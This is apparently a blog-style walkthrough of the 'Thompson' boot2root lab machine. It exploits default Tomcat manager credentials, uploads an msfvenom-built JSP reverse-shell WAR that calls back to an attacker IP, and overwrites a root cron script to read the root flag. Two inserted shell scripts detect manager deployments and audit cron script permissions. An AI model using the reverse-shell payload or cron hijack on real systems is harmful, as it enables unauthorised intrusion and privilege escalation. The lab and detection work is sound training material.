Thompson

Pavithra Santhosh
4 min read, Jun 14, 2021


Introduction

Hi Techies,

In this post we are going to explore a new topic: a boot2root machine.

Let’s get started

Deploy

As usual, the first step is to deploy the machine.

Deploy

Connect with VPN & check connectivity

Checking connectivity

Reconnaissance

We will check for open ports on the vulnerable machine.

#nmap -sS -sV -O 10.10.142.92

Enumeration

We got three open ports.

Since port 8080 (HTTP) is open, we will check the web server.

Opening the web server on port 8080, we get some information about Tomcat.

After going through the entire Tomcat page, we can see that there are three buttons. We will check them.

We will click on the server status button

web-server

Once the button is clicked, a dialog box prompts for credentials.

As we are not sure of the credentials, we click the cancel button. It redirects to a page that contains the credentials for the Tomcat manager.

Username :- tomcat

Password :- s3cret

server-status

We will log in to the Tomcat manager application with the credentials we found.

It directs us to another page.


It tells us that we can deploy an application by uploading a WAR file.

A search on the internet shows how to generate a WAR file payload.

We will create a WAR file.

#msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.11.235 LPORT=1234 -f war > shell.war

Since we have created the WAR file, we will upload it to the web server.

1. user.txt

After deploying the WAR file, we got the shell in the browser.

Open a listening port

#nc -lvnp 1234

Open /shell in the browser.
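From the defender's side, every step above leaves a trace in Tomcat's access log: the manager login, the upload through the manager UI and the first request to the newly deployed context. The following is an added example, not part of this write-up, that pulls deployment requests out of a constructed access log sample in Tomcat's default "common" log pattern. The manager paths it matches (POST /manager/html/upload for the web UI and PUT /manager/text/deploy for the text API) are Tomcat's real manager endpoints; the IP, user, timestamps and context path /x are constructed sample values.

```shell
#!/bin/sh
# Added defensive example (not from the original write-up).
# Constructed sample of a Tomcat access log in the default "common" pattern:
# host ident user [time] "method path protocol" status bytes
# The third field is the authenticated manager user (here the "tomcat" account).
SAMPLE_LOG='10.17.11.235 - - [14/Jun/2021:10:11:02 +0000] "GET /manager/status HTTP/1.1" 401 2536
10.17.11.235 - tomcat [14/Jun/2021:10:11:40 +0000] "GET /manager/html HTTP/1.1" 200 19042
10.17.11.235 - tomcat [14/Jun/2021:10:12:33 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=EXAMPLE HTTP/1.1" 303 -
10.17.11.235 - tomcat [14/Jun/2021:10:12:34 +0000] "GET /manager/html HTTP/1.1" 200 19300
10.17.11.235 - - [14/Jun/2021:10:12:50 +0000] "GET /shell/ HTTP/1.1" 200 -
10.17.11.235 - tomcat [14/Jun/2021:10:14:01 +0000] "PUT /manager/text/deploy?path=/x HTTP/1.1" 200 48'

# Print "user method path" for every request that deploys an application
# through the manager web UI (POST /manager/html/upload) or the manager
# text API (PUT /manager/text/deploy). Reads log lines from stdin.
find_manager_deploys() {
    awk '{
        method = $6; sub(/^"/, "", method)
        if ((method == "POST" || method == "PUT") &&
            ($7 ~ /^\/manager\/html\/upload/ || $7 ~ /^\/manager\/text\/deploy/))
            print $3, method, $7
    }'
}

# Count deployment requests on stdin, so the number can be alerted on.
# grep -c prints 0 but exits 1 when nothing matches; keep the 0.
count_manager_deploys() {
    find_manager_deploys | { grep -c . || true; }
}

# Usage: run the detection over the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | find_manager_deploys
```

A deployment by the manager account from an address that does not normally administer the server, or any deployment at all on a host where nobody should be deploying, is the event worth alerting on; removing the manager web application, or restricting it to localhost with a RemoteAddrValve, removes the path entirely.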

Go to the home directory.

Inside the home directory, we find the jack user and the user flag.

In jack's home directory, we have another two files, “test.txt” and “id.sh”. We will look at their contents.

We found that the contents of “test.txt” point to root.

2. root.txt

Usually the id.sh file is executed by the root user, and its output is written to test.txt as well.

So we will check the crontab.

Since id.sh is executed by the root user, we will overwrite id.sh with a command that copies root.txt from the root user's home directory.

#echo "cp /root/root.txt /home/jack/root.txt" > id.sh

It gives us the root flag.
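The root cause of this escalation is a scheduled job that runs as root but executes a script a lower-privileged user can modify. As an added example, not part of this write-up, here is a small audit that reads an /etc/crontab-style file (with the user field), takes the first absolute path in each job's command and reports it when the file is writable by group or others, or owned by a user other than the one the job runs as. The crontab, the scripts and the temporary directory are constructed for the example; the only path taken from the write-up is the id.sh name, and the portable `ls -ld` mode string is assumed to be in the usual `-rwxrwxrwx 1 owner group ...` form.

```shell
#!/bin/sh
# Added defensive check (not from the original write-up). It reads an
# /etc/crontab-style file (fields: min hour dom mon dow user command) and
# reports jobs whose script is writable by group/other, or owned by someone
# other than the user the job runs as. Either condition lets a lower
# privileged user change what the scheduled job executes.
audit_cron_scripts() {
    crontab_file=$1
    # Skip comments, blank lines and VAR=value settings such as SHELL= and PATH=.
    grep -Ev '^[[:space:]]*(#|$)|^[A-Za-z_]+=' "$crontab_file" |
    while read -r min hour dom mon dow user cmd; do
        script=
        # Take the first absolute path in the command as the script being run
        # (kept simple on purpose: @reboot-style entries and "sh script" are not handled).
        for tok in $cmd; do
            case $tok in
                /*) script=$tok; break ;;
            esac
        done
        [ -n "$script" ] || continue
        if [ ! -e "$script" ]; then
            echo "MISSING $user $script"
            continue
        fi
        # ls -ld gives a portable mode string and owner: -rwxrwxrwx 1 owner group ...
        set -- $(ls -ld "$script")
        mode=$1
        owner=$3
        # 6th character is the group write bit, 9th is the other write bit.
        case $mode in
            ?????w*|????????w*) echo "WRITABLE $user $script $mode" ;;
        esac
        [ "$owner" = "$user" ] || echo "OWNER $user $script owner=$owner"
    done
}

# Build a constructed sample in a temp dir: a world-writable id.sh (the
# pattern from the box) and a properly locked-down script, plus a crontab
# that runs both as root. Prints the directory path.
setup_sample_cron() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\nid\n' > "$dir/id.sh"
    printf '#!/bin/sh\necho ok\n' > "$dir/safe.sh"
    chmod 777 "$dir/id.sh"
    chmod 755 "$dir/safe.sh"
    cat > "$dir/crontab" <<EOF
# constructed sample crontab
SHELL=/bin/sh
PATH=/usr/bin:/bin
* * * * * root $dir/id.sh
0 3 * * * root $dir/safe.sh
EOF
    echo "$dir"
}

# Usage: audit the constructed sample and clean up.
sample=$(setup_sample_cron)
audit_cron_scripts "$sample/crontab"
rm -rf "$sample"
```

On a real system the same check is worth running over /etc/crontab and the files under /etc/cron.d; the fix is to make any script executed by a root job owned by root and mode 755 or stricter, so that nobody else can rewrite it before the next run.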

We found the flags

Completed the box

I hope this blog is quite interesting for learning new topics and helps you to gain knowledge about the boot2root machine concept.

Happy learning!!!


Written by Pavithra Santhosh

This is Pavithra Santhosh, an aspiring cyber security professional, currently part of the Red Team certification programme from Hacker U.
